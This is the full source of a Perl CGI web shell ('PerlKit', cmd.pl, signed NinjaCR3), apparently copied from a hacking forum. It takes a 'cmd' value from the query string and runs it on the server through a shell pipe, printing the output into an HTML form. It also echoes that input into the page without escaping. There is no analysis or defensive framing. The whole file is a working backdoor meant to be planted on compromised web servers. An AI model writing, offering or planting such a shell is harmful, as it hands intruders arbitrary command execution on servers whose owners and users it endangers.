PerlKit Webshell

1. #!/usr/bin/perl -I/usr/local/bandmain
2. #
3. # PerlKit-0.1 - [Doar userii inregistrati pot vedea linkurile. ]
4. #
5. # cmd.pl: Run commands on a webserver
6.  
7. use strict;
8.  
9. my ($cmd, %FORM);
10.  
11. $|=1;
12.  
13. print "Content-Type: text/html\r\n";
14. print "\r\n";
15.  
16. # Get parameters
17.  
18. %FORM = parse_parameters($ENV{'QUERY_STRING'});
19.  
20. if(defined $FORM{'cmd'}) {
21.   $cmd = $FORM{'cmd'};
22. }
23.  
24. print '<HTML>
25. <img src="https://resmim.net/f/yldrhM.png?nocache" width="300" height="80"><h1>Cgi Command Run<br>NinjaCR3</h1>
26. <body>
27. <form action="" method="GET">
28. <input type="text" name="cmd" size=45 value="' . $cmd . '">
29. <input type="submit" value="Run">
30. </form>
31. <pre>';
32.  
33. if(defined $FORM{'cmd'}) {
34.   print "Results of '$cmd' execution:\n\n";
35.   print "\n";
36.  
37.   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38.  
39.   while(<CMD>) {
40.     print;
41.   }
42.  
43.   close(CMD);
44.   print "\n";
45. }
46.  
47. print "</pre>";
48.  
49. sub parse_parameters ($) {
50.   my %ret;
51.  
52.   my $input = shift;
53.  
54.   foreach my $pair (split('&', $input)) {
55.     my ($var, $value) = split('=', $pair, 2);
56.    
57.     if($var) {
58.       $value =~ s/\+/ /g ;
59.       $value =~ s/%(..)/pack('c',hex($1))/eg;
60.  
61.       $ret{$var} = $value;
62.     }
63.   }
64.  
65.   return %ret;
66. }
67.